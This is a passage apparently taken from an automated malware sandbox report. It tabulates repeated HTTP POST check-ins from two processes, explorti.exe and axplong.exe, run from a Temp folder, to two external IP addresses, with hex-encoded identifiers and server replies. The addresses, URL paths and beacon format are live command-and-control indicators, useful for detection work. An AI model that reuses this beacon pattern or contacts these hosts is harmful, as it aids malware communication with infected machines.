Jul 26, 2024 17:57:28.680654049 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:28.928714991 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	61265	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:28.363989115 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:29.122265100 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:29.125631094 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:29.373516083 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	61267	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:29.067243099 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:29.831120968 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:29.831849098 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:30.084817886 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	61268	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:29.488871098 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:30.266145945 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:30.267014027 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:30.516149044 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	61269	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:30.234288931 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:31.011657000 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:31.012347937 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:31.265664101 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	61270	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:30.628381014 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:31.372880936 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:31.374917984 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:31.635319948 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	61272	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:31.382952929 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:32.169315100 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:32.170336008 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:32.419147968 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	61273	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:31.772640944 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:32.599390984 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:32.629724026 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:32.890374899 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	61277	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:32.542367935 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:33.302707911 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:33.304523945 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:33.557368040 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	61280	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:33.018059015 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:33.797636986 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:33.831162930 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:34.083802938 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	61281	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:33.681474924 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:34.454729080 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:34.455992937 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:34.731972933 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	61282	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:34.381119013 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:35.148248911 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:35.149828911 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:35.406351089 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	61284	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:34.846581936 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:35.629235983 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:35.630218983 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:35.882271051 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
